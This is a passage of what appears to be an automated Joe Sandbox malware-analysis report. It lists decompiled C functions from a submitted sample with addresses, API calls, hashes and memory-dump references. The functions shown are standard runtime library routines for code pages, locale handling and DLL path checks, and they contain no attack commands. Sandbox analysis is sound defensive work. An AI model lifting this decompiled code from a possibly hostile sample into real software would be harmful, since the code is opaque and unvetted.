                                                                                                                              0x0040fe39
                                                                                                                              0x0040fe3c
                                                                                                                              0x0040fe43
                                                                                                                              0x0040fe49

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteObject$CloseHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4038695863-0
                                                                                                                              • Opcode ID: 528d5ed4d5fd1657fb02cc78a76e98f51ee61ec362d8b4303794228079352cc2
                                                                                                                              • Instruction ID: 5525ea5770cae5e4a26986b31cfb9288208bca2ca3aee45731e3c4179f5d3654
                                                                                                                              • Opcode Fuzzy Hash: 528d5ed4d5fd1657fb02cc78a76e98f51ee61ec362d8b4303794228079352cc2
                                                                                                                              • Instruction Fuzzy Hash: D011CCB1500B149BC334AFAAD984957F3F9BF88704B519D2ED19A83A10CBB9F448CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420861 Relevance: 10.7, APIs: 7, Instructions: 158COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E00420861(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				int _t56;
				signed char _t59;
				int _t61;
				short* _t62;
				signed int _t67;
				signed char* _t77;
				signed int _t80;
				int _t81;
				signed int _t84;
				intOrPtr* _t85;
				int _t89;
				signed char _t90;
				signed int _t91;
				int _t93;
				int _t95;
				signed int _t96;
				signed int _t99;
				intOrPtr* _t103;
				signed int _t105;

				_t53 =  *0x43a6a8; // 0x2a5cd135
				_v8 = _t53 ^ _t105;
				_t81 = _a8;
				_t95 = E004207E7(_a4);
				_t98 = 0;
				_t110 = _t95;
				_a4 = _t95;
				if(_t95 != 0) {
					_v32 = 0;
					_t56 = 0;
					__eflags = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t56 + 0x43ace8)) - _t95;
						if( *((intOrPtr*)(_t56 + 0x43ace8)) == _t95) {
							break;
						}
						_v32 = _v32 + 1;
						_t56 = _t56 + 0x30;
						__eflags = _t56 - 0xf0;
						if(_t56 < 0xf0) {
							continue;
						} else {
							__eflags = _t95 - 0xfde8;
							if(_t95 == 0xfde8) {
								L35:
								_t65 = _t56 | 0xffffffff;
								__eflags = _t56 | 0xffffffff;
							} else {
								__eflags = _t95 - 0xfde9;
								if(_t95 == 0xfde9) {
									goto L35;
								} else {
									_t56 = IsValidCodePage(_t95 & 0x0000ffff);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L35;
									} else {
										_t56 = GetCPInfo(_t95,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0x43c170 - _t98; // 0x0
											if(__eflags != 0) {
												goto L1;
											} else {
												goto L35;
											}
										} else {
											E0041B880(_t95, _t81 + 0x1c, _t98, 0x101);
											_t93 = 1;
											__eflags = _v28 - 1;
											 *(_t81 + 4) = _t95;
											 *(_t81 + 0xc) = _t98;
											if(_v28 <= 1) {
												 *(_t81 + 8) = _t98;
											} else {
												__eflags = _v22;
												if(_v22 != 0) {
													_t103 =  &_v21;
													while(1) {
														_t90 =  *_t103;
														__eflags = _t90;
														if(_t90 == 0) {
															goto L29;
														}
														_t80 =  *(_t103 - 1) & 0x000000ff;
														_t91 = _t90 & 0x000000ff;
														while(1) {
															__eflags = _t80 - _t91;
															if(_t80 > _t91) {
																break;
															}
															 *(_t81 + _t80 + 0x1d) =  *(_t81 + _t80 + 0x1d) | 0x00000004;
															_t80 = _t80 + 1;
															__eflags = _t80;
														}
														_t103 = _t103 + 2;
														__eflags =  *(_t103 - 1);
														if( *(_t103 - 1) != 0) {
															continue;
														}
														goto L29;
													}
												}
												L29:
												_t77 = _t81 + 0x1e;
												_t89 = 0xfe;
												do {
													 *_t77 =  *_t77 | 0x00000008;
													_t77 =  &(_t77[1]);
													_t89 = _t89 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t81 + 0xc) = E00420535( *(_t81 + 4));
												 *(_t81 + 8) = _t93;
											}
											_t95 = _t81 + 0x10;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L25:
											_t98 = _t81;
											E004205B9(_t81);
											goto L2;
										}
									}
								}
							}
						}
						goto L36;
					}
					E0041B880(_t95, _t81 + 0x1c, _t98, 0x101);
					_t84 = _v32 * 0x30;
					_v36 = _t98;
					_t20 = _t84 + 0x43acf8; // 0x43acf8
					_t99 = _t20;
					_v32 = _t99;
					while(1) {
						L21:
						__eflags =  *_t99;
						if( *_t99 == 0) {
							break;
						}
						_t22 = _t99 + 1; // 0xdf
						_t59 =  *_t22;
						__eflags = _t59;
						if(_t59 != 0) {
							_t96 =  *_t99 & 0x000000ff;
							_t67 = _t59 & 0x000000ff;
							while(1) {
								__eflags = _t96 - _t67;
								if(_t96 > _t67) {
									break;
								}
								 *(_t81 + _t96 + 0x1d) =  *(_t81 + _t96 + 0x1d) |  *(_v36 + 0x43ace4);
								_t29 = _t99 + 1; // 0xdf
								_t67 =  *_t29 & 0x000000ff;
								_t96 = _t96 + 1;
								__eflags = _t96;
							}
							_t95 = _a4;
							_t99 = _t99 + 2;
							__eflags = _t99;
							continue;
						}
						break;
					}
					_v36 = _v36 + 1;
					_t99 = _v32 + 8;
					__eflags = _v36 - 4;
					_v32 = _t99;
					if(_v36 < 4) {
						goto L21;
					}
					 *(_t81 + 4) = _t95;
					 *(_t81 + 8) = 1;
					_t61 = E00420535(_t95);
					 *(_t81 + 0xc) = _t61;
					_t62 = _t81 + 0x10;
					_t85 = _t84 + 0x43acec;
					_t93 = 6;
					do {
						 *_t62 =  *_t85;
						_t85 = _t85 + 2;
						_t62 = _t62 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L25;
				} else {
					L1:
					E00420564(_t81, _t110);
					L2:
					_t65 = 0;
				}
				L36:
				return E0041B3F9(_t65, _t81, _v8 ^ _t105, _t93, _t95, _t98);
			}
































                                                                                                                              0x00420867
                                                                                                                              0x0042086e
                                                                                                                              0x00420872
                                                                                                                              0x0042087f
                                                                                                                              0x00420881
                                                                                                                              0x00420883
                                                                                                                              0x00420885
                                                                                                                              0x00420888
                                                                                                                              0x00420898
                                                                                                                              0x0042089b
                                                                                                                              0x0042089b
                                                                                                                              0x0042089d
                                                                                                                              0x0042089d
                                                                                                                              0x004208a3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004208a9
                                                                                                                              0x004208ac
                                                                                                                              0x004208af
                                                                                                                              0x004208b4
                                                                                                                              0x00000000
                                                                                                                              0x004208b6
                                                                                                                              0x004208b6
                                                                                                                              0x004208bc
                                                                                                                              0x00420a28
                                                                                                                              0x00420a28
                                                                                                                              0x00420a28
                                                                                                                              0x004208c2
                                                                                                                              0x004208c2
                                                                                                                              0x004208c8
                                                                                                                              0x00000000
                                                                                                                              0x004208ce
                                                                                                                              0x004208d2
                                                                                                                              0x004208d8
                                                                                                                              0x004208da
                                                                                                                              0x00000000
                                                                                                                              0x004208e0
                                                                                                                              0x004208e5
                                                                                                                              0x004208eb
                                                                                                                              0x004208ed
                                                                                                                              0x00420a1c
                                                                                                                              0x00420a22
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004208f3
                                                                                                                              0x004208fd
                                                                                                                              0x00420904
                                                                                                                              0x00420908
                                                                                                                              0x0042090b
                                                                                                                              0x0042090e
                                                                                                                              0x00420911
                                                                                                                              0x00420a0f
                                                                                                                              0x00420917
                                                                                                                              0x00420917
                                                                                                                              0x0042091b
                                                                                                                              0x00420921
                                                                                                                              0x00420924
                                                                                                                              0x00420924
                                                                                                                              0x00420926
                                                                                                                              0x00420928
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042092e
                                                                                                                              0x00420932
                                                                                                                              0x004209e0
                                                                                                                              0x004209e0
                                                                                                                              0x004209e2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004209da
                                                                                                                              0x004209df
                                                                                                                              0x004209df
                                                                                                                              0x004209df
                                                                                                                              0x004209e5
                                                                                                                              0x004209e6
                                                                                                                              0x004209ea
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004209ea
                                                                                                                              0x00420924
                                                                                                                              0x004209f0
                                                                                                                              0x004209f0
                                                                                                                              0x004209f3
                                                                                                                              0x004209f8
                                                                                                                              0x004209f8
                                                                                                                              0x004209fb
                                                                                                                              0x004209fc
                                                                                                                              0x004209fc
                                                                                                                              0x004209fc
                                                                                                                              0x00420a07
                                                                                                                              0x00420a0a
                                                                                                                              0x00420a0a
                                                                                                                              0x00420a14
                                                                                                                              0x00420a17
                                                                                                                              0x00420a18
                                                                                                                              0x00420a19
                                                                                                                              0x004209ce
                                                                                                                              0x004209ce
                                                                                                                              0x004209d0
                                                                                                                              0x00000000
                                                                                                                              0x004209d0
                                                                                                                              0x004208ed
                                                                                                                              0x004208da
                                                                                                                              0x004208c8
                                                                                                                              0x004208bc
                                                                                                                              0x00000000
                                                                                                                              0x004208b4
                                                                                                                              0x00420944
                                                                                                                              0x0042094f
                                                                                                                              0x00420952
                                                                                                                              0x00420955
                                                                                                                              0x00420955
                                                                                                                              0x0042095b
                                                                                                                              0x0042098a
                                                                                                                              0x0042098a
                                                                                                                              0x0042098a
                                                                                                                              0x0042098d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420960
                                                                                                                              0x00420960
                                                                                                                              0x00420963
                                                                                                                              0x00420965
                                                                                                                              0x00420967
                                                                                                                              0x0042096a
                                                                                                                              0x00420981
                                                                                                                              0x00420981
                                                                                                                              0x00420983
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420978
                                                                                                                              0x0042097c
                                                                                                                              0x0042097c
                                                                                                                              0x00420980
                                                                                                                              0x00420980
                                                                                                                              0x00420980
                                                                                                                              0x00420985
                                                                                                                              0x00420989
                                                                                                                              0x00420989
                                                                                                                              0x00000000
                                                                                                                              0x00420989
                                                                                                                              0x00000000
                                                                                                                              0x00420965
                                                                                                                              0x00420992
                                                                                                                              0x00420995
                                                                                                                              0x00420998
                                                                                                                              0x0042099c
                                                                                                                              0x0042099f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004209a3
                                                                                                                              0x004209a6
                                                                                                                              0x004209ad
                                                                                                                              0x004209b4
                                                                                                                              0x004209b7
                                                                                                                              0x004209ba
                                                                                                                              0x004209c0
                                                                                                                              0x004209c1
                                                                                                                              0x004209c5
                                                                                                                              0x004209c8
                                                                                                                              0x004209ca
                                                                                                                              0x004209cb
                                                                                                                              0x004209cb
                                                                                                                              0x004209cb
                                                                                                                              0x00000000
                                                                                                                              0x0042088a
                                                                                                                              0x0042088a
                                                                                                                              0x0042088c
                                                                                                                              0x00420891
                                                                                                                              0x00420891
                                                                                                                              0x00420891
                                                                                                                              0x00420a2b
                                                                                                                              0x00420a39

                                                                                                                              APIs
                                                                                                                              • getSystemCP.LIBCMT ref: 0042087A
                                                                                                                                • Part of subcall function 004207E7: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004207F4
                                                                                                                                • Part of subcall function 004207E7: GetOEMCP.KERNEL32(00000000,?,0042087F,00000001,00000000,00000000,0041A686,00000000,0000002E,?), ref: 0042080E
                                                                                                                              • setSBCS.LIBCMT ref: 0042088C
                                                                                                                                • Part of subcall function 00420564: _memset.LIBCMT ref: 00420577
                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000001,00000000,00000000,0041A686), ref: 004208D2
                                                                                                                              • GetCPInfo.KERNEL32(00000000,0000002E), ref: 004208E5
                                                                                                                              • _memset.LIBCMT ref: 004208FD
                                                                                                                              • setSBUpLow.LIBCMT ref: 004209D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2658552758-0
                                                                                                                              • Opcode ID: b74285d5f2dd7278efd64aa46785bca39b9cee6bf2b063562f0b16a825612625
                                                                                                                              • Instruction ID: 9c9453d672237c105f68631b085411cc1ce1b5e5f9b796706ee01e528fbcedba
                                                                                                                              • Opcode Fuzzy Hash: b74285d5f2dd7278efd64aa46785bca39b9cee6bf2b063562f0b16a825612625
                                                                                                                              • Instruction Fuzzy Hash: C151E671A042659BEB15DF25D8846BFBBE4EF05304F94906BD8869F243D63C8882CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419411 Relevance: 10.6, APIs: 7, Instructions: 142libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 79%
                                                                                                                              			E00419411(void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v272;
				char _v536;
				char _v792;
				char _v1056;
				char _v1320;
				CHAR* _v1324;
				char _v1328;
				void* __ebx;
				intOrPtr _t43;
				intOrPtr* _t44;
				struct HINSTANCE__* _t45;
				long _t56;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t70;
				void* _t71;
				void* _t74;
				CHAR* _t85;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t94;
				void* _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t104;

				_t100 = __esi;
				_t98 = __edi;
				_t43 =  *0x43a6a8; // 0x2a5cd135
				_v8 = _t43;
				_t44 =  *0x43cc34; // 0x0
				if(_t44 == 0) {
					L2:
					_t45 = LoadLibraryA( *0x43a508);
					_v1324 = _t45;
					if(_t45 != 0) {
						_push(_t100);
						if(GetSystemDirectoryA( &_v1056, 0x104) == 0) {
							_v1056 = 0;
						}
						if(GetWindowsDirectoryA( &_v1320, 0x104) == 0) {
							_v1320 = 0;
						}
						_push(_t98);
						if(GetModuleFileNameA(_v1324,  &_v272, 0x104) == 0) {
							_v272 = 0;
						}
						_t56 = GetModuleFileNameA(GetModuleHandleA(0),  &_v536, 0x104);
						_pop(_t98);
						if(_t56 == 0) {
							_v536 = 0;
						}
						E00419374( &_v536,  &_v1328,  &_v792);
						_t61 =  &_v1328;
						_t95 = _t61 + 1;
						do {
							_t88 =  *_t61;
							_t61 = _t61 + 1;
						} while (_t88 != 0);
						_t89 = _t61 - _t95;
						_t63 =  &_v792;
						_t102 = _t63 + 1;
						do {
							_t96 =  *_t63;
							_t63 = _t63 + 1;
						} while (_t96 != 0);
						 *((char*)(_t104 + _t63 - _t102 + _t89 - 0x213)) = 0;
						E00419374( &_v272,  &_v1328,  &_v792);
						_t70 =  &_v1328;
						_t90 = _t70 + 1;
						do {
							_t97 =  *_t70;
							_t70 = _t70 + 1;
						} while (_t97 != 0);
						_t71 = _t70 - _t90;
						_t91 =  &_v792;
						_t103 = _t91 + 1;
						do {
							_t94 =  *_t91;
							_t91 = _t91 + 1;
						} while (_t94 != 0);
						 *((char*)(_t104 + _t91 - _t103 + _t71 - 0x10b)) = 0;
						_t74 = E004192A5( &_v1320,  &_v272);
						_pop(_t100);
						if(_t74 != 0 || E004192A5( &_v1320,  &_v536) == 0) {
							if(E004192A5( &_v1056,  &_v272) == 0 && E004192A5( &_v1056,  &_v536) != 0) {
								goto L23;
							}
						} else {
							L23:
							FreeLibrary(_v1324);
							_v1324 = 0;
						}
					}
				} else {
					_t85 =  *_t44();
					_v1324 = _t85;
					if(_t85 == 0) {
						goto L2;
					}
				}
				return E0041B3F9(_v1324, 0, _v8, _t94, _t98, _t100);
			}



































                                                                                                                              0x00419411
                                                                                                                              0x00419411
                                                                                                                              0x0041941c
                                                                                                                              0x00419421
                                                                                                                              0x00419424
                                                                                                                              0x0041942e
                                                                                                                              0x00419440
                                                                                                                              0x00419446
                                                                                                                              0x0041944e
                                                                                                                              0x00419454
                                                                                                                              0x0041945a
                                                                                                                              0x00419470
                                                                                                                              0x00419472
                                                                                                                              0x00419472
                                                                                                                              0x00419488
                                                                                                                              0x0041948a
                                                                                                                              0x0041948a
                                                                                                                              0x00419490
                                                                                                                              0x004194a9
                                                                                                                              0x004194ab
                                                                                                                              0x004194ab
                                                                                                                              0x004194c1
                                                                                                                              0x004194c5
                                                                                                                              0x004194c6
                                                                                                                              0x004194c8
                                                                                                                              0x004194c8
                                                                                                                              0x004194e3
                                                                                                                              0x004194e8
                                                                                                                              0x004194ee
                                                                                                                              0x004194f1
                                                                                                                              0x004194f1
                                                                                                                              0x004194f3
                                                                                                                              0x004194f4
                                                                                                                              0x004194fa
                                                                                                                              0x004194fc
                                                                                                                              0x00419502
                                                                                                                              0x00419505
                                                                                                                              0x00419505
                                                                                                                              0x00419507
                                                                                                                              0x00419508
                                                                                                                              0x00419510
                                                                                                                              0x0041952c
                                                                                                                              0x00419531
                                                                                                                              0x00419537
                                                                                                                              0x0041953a
                                                                                                                              0x0041953a
                                                                                                                              0x0041953c
                                                                                                                              0x0041953d
                                                                                                                              0x00419541
                                                                                                                              0x00419543
                                                                                                                              0x00419549
                                                                                                                              0x0041954c
                                                                                                                              0x0041954c
                                                                                                                              0x0041954e
                                                                                                                              0x0041954f
                                                                                                                              0x00419565
                                                                                                                              0x0041956c
                                                                                                                              0x00419573
                                                                                                                              0x00419574
                                                                                                                              0x004195a2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004195bb
                                                                                                                              0x004195bb
                                                                                                                              0x004195c1
                                                                                                                              0x004195c7
                                                                                                                              0x004195c7
                                                                                                                              0x00419574
                                                                                                                              0x00419430
                                                                                                                              0x00419430
                                                                                                                              0x00419434
                                                                                                                              0x0041943a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041943a
                                                                                                                              0x004195dd

                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32 ref: 00419446
                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00419468
                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00419480
                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004194A5
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 004194BA
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000), ref: 004194C1
                                                                                                                                • Part of subcall function 004192A5: CompareStringA.KERNEL32(00000409,00000001,?,000000FF,?,000000FF), ref: 004192BB
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 004195C1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Module$DirectoryFileLibraryName$CompareFreeHandleLoadStringSystemWindows
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3624046510-0
                                                                                                                              • Opcode ID: f78f63c4fa9f300f5ca77eef0e29ab70f19974795744507a2f2a6c84c7e523f6
                                                                                                                              • Instruction ID: 27ae5ec048ddc3f9d1631f5a9f0edb0b3c0e9819ababad7b107d2ab68f31c364
                                                                                                                              • Opcode Fuzzy Hash: f78f63c4fa9f300f5ca77eef0e29ab70f19974795744507a2f2a6c84c7e523f6
                                                                                                                              • Instruction Fuzzy Hash: 05516D7290412DAACB21DBA4DD94ADB77BDAF1A304F0041E6E549E3201E635DFC9CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A778 Relevance: 10.6, APIs: 7, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041A778(short* _a4, int _a8, intOrPtr _a12, char* _a16, char _a20) {
				void* __edi;
				void* __esi;
				char _t35;
				int _t36;
				char _t37;
				char _t40;
				signed int _t46;
				void* _t48;
				void* _t49;
				char _t54;
				void* _t56;
				void* _t60;
				char _t63;
				signed short* _t64;
				short* _t66;
				char _t67;
				void* _t77;
				char* _t78;
				void* _t79;
				char _t80;
				char* _t81;

				_t78 = _a8;
				if(_t78 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t78 != 0) {
						_t35 = _a20;
						__eflags = _t35;
						if(__eflags != 0) {
							_t80 =  *_t35;
							_t36 =  *((intOrPtr*)(_t35 + 4));
						} else {
							_t80 =  *(E0041D463(_t77, _t78, _t79, __eflags) + 8);
							_t36 = E0041D43D(_t77, _t78, _t80, __eflags);
						}
						__eflags = _t80;
						_a8 = _t36;
						if(_t80 != 0) {
							_t37 = E0041A695(_a8);
							_t81 = _a16;
							__eflags =  *_t81;
							_t67 = _t37;
							if( *_t81 == 0) {
								__eflags = _t67;
								if(__eflags != 0) {
									_t40 =  *( *((intOrPtr*)(_t67 + 4)) + ( *_t78 & 0x000000ff) + 0x1d) & 4;
									__eflags = _t40;
								} else {
									_t40 =  *(E0041CFC8(_t77, _t78, _t81, __eflags) + ( *_t78 & 0x000000ff) * 2) & 0x8000;
								}
								__eflags = _t40;
								if(_t40 == 0) {
									__eflags = _a4;
									__eflags = MultiByteToWideChar(_a8, 9, _t78, 1, _a4, 0 | _a4 != 0x00000000);
									if(__eflags != 0) {
										goto L13;
									}
									goto L20;
								} else {
									_t48 = E0041D427(_t77, _t78, _t81, _t67);
									__eflags = _a12 - _t48;
									if(_a12 >= _t48) {
										_t49 = E0041D427(_t77, _t78, _t81, _t67);
										__eflags = _t49 - 1;
										if(_t49 <= 1) {
											L29:
											__eflags = _t78[1];
											if(_t78[1] != 0) {
												L18:
												return E0041D427(_t77, _t78, _t81, _t67);
											}
											L19:
											 *_t81 =  *_t81 & 0x00000000;
											__eflags =  *_t81;
											L20:
											_t46 = E0041B805(__eflags);
											 *_t46 = 0x2a;
											return _t46 | 0xffffffff;
										}
										__eflags = _a4;
										_t54 = MultiByteToWideChar(_a8, 9, _t78, E0041D427(_t77, _t78, _t81, _t67), _a4, 0 | _a4 != 0x00000000);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L18;
										}
										goto L29;
									}
									 *_t81 =  *_t78;
									_t56 = 0xfffffffe;
									return _t56;
								}
							}
							_t81[1] =  *_t78;
							_t60 = E0041D427(_t77, _t78, _t81, _t67);
							__eflags = _t60 - 1;
							if(_t60 <= 1) {
								goto L19;
							}
							__eflags = _a4;
							_t63 = MultiByteToWideChar(_a8, 9, _t81, 2, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t63;
							if(_t63 == 0) {
								goto L19;
							}
							 *_t81 =  *_t81 & 0x00000000;
							__eflags =  *_t81;
							goto L18;
						} else {
							_t64 = _a4;
							__eflags = _t64;
							if(_t64 != 0) {
								 *_t64 =  *_t78 & 0x000000ff;
							}
							L13:
							return 1;
						}
					} else {
						_t66 = _a4;
						if(_t66 != 0) {
							 *_t66 =  *_t66 & 0x00000000;
						}
						goto L5;
					}
				}
			}
























                                                                                                                              0x0041a77e
                                                                                                                              0x0041a783
                                                                                                                              0x0041a79b
                                                                                                                              0x00000000
                                                                                                                              0x0041a78b
                                                                                                                              0x0041a78e
                                                                                                                              0x0041a7a2
                                                                                                                              0x0041a7a5
                                                                                                                              0x0041a7a7
                                                                                                                              0x0041a7b8
                                                                                                                              0x0041a7ba
                                                                                                                              0x0041a7a9
                                                                                                                              0x0041a7ae
                                                                                                                              0x0041a7b1
                                                                                                                              0x0041a7b1
                                                                                                                              0x0041a7bd
                                                                                                                              0x0041a7bf
                                                                                                                              0x0041a7c2
                                                                                                                              0x0041a7da
                                                                                                                              0x0041a7df
                                                                                                                              0x0041a7e2
                                                                                                                              0x0041a7e6
                                                                                                                              0x0041a7e8
                                                                                                                              0x0041a83e
                                                                                                                              0x0041a840
                                                                                                                              0x0041a860
                                                                                                                              0x0041a860
                                                                                                                              0x0041a842
                                                                                                                              0x0041a84e
                                                                                                                              0x0041a84e
                                                                                                                              0x0041a863
                                                                                                                              0x0041a865
                                                                                                                              0x0041a8c4
                                                                                                                              0x0041a8dc
                                                                                                                              0x0041a8de
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041a867
                                                                                                                              0x0041a868
                                                                                                                              0x0041a86d
                                                                                                                              0x0041a871
                                                                                                                              0x0041a880
                                                                                                                              0x0041a885
                                                                                                                              0x0041a889
                                                                                                                              0x0041a8b3
                                                                                                                              0x0041a8b3
                                                                                                                              0x0041a8b7
                                                                                                                              0x0041a81c
                                                                                                                              0x00000000
                                                                                                                              0x0041a822
                                                                                                                              0x0041a828
                                                                                                                              0x0041a828
                                                                                                                              0x0041a828
                                                                                                                              0x0041a82b
                                                                                                                              0x0041a82b
                                                                                                                              0x0041a830
                                                                                                                              0x00000000
                                                                                                                              0x0041a836
                                                                                                                              0x0041a88d
                                                                                                                              0x0041a8a5
                                                                                                                              0x0041a8ab
                                                                                                                              0x0041a8ad
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041a8ad
                                                                                                                              0x0041a877
                                                                                                                              0x0041a879
                                                                                                                              0x00000000
                                                                                                                              0x0041a879
                                                                                                                              0x0041a865
                                                                                                                              0x0041a7ed
                                                                                                                              0x0041a7f0
                                                                                                                              0x0041a7f5
                                                                                                                              0x0041a7f9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041a7fd
                                                                                                                              0x0041a80f
                                                                                                                              0x0041a815
                                                                                                                              0x0041a817
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041a819
                                                                                                                              0x0041a819
                                                                                                                              0x00000000
                                                                                                                              0x0041a7c4
                                                                                                                              0x0041a7c4
                                                                                                                              0x0041a7c7
                                                                                                                              0x0041a7c9
                                                                                                                              0x0041a7cf
                                                                                                                              0x0041a7cf
                                                                                                                              0x0041a7d2
                                                                                                                              0x00000000
                                                                                                                              0x0041a7d4
                                                                                                                              0x0041a790
                                                                                                                              0x0041a790
                                                                                                                              0x0041a795
                                                                                                                              0x0041a797
                                                                                                                              0x0041a797
                                                                                                                              0x00000000
                                                                                                                              0x0041a795
                                                                                                                              0x0041a78e

                                                                                                                              APIs
                                                                                                                              • ____lc_handle_func.LIBCMT ref: 0041A7A9
                                                                                                                              • ____lc_codepage_func.LIBCMT ref: 0041A7B1
                                                                                                                              • __GetLocaleForCP.LIBCPMT ref: 0041A7DA
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,00000000,-00000001,?,00000000,0041545C,00000000,?,?,?,?), ref: 0041A80F
                                                                                                                              • ___pctype_func.LIBCMT ref: 0041A842
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,00000000,00000000,-00000001,?,00000000,0041545C,00000000,?,?,?,?), ref: 0041A8A5
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,-00000001,?,00000000,0041545C,00000000,?,?,?,?), ref: 0041A8D6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
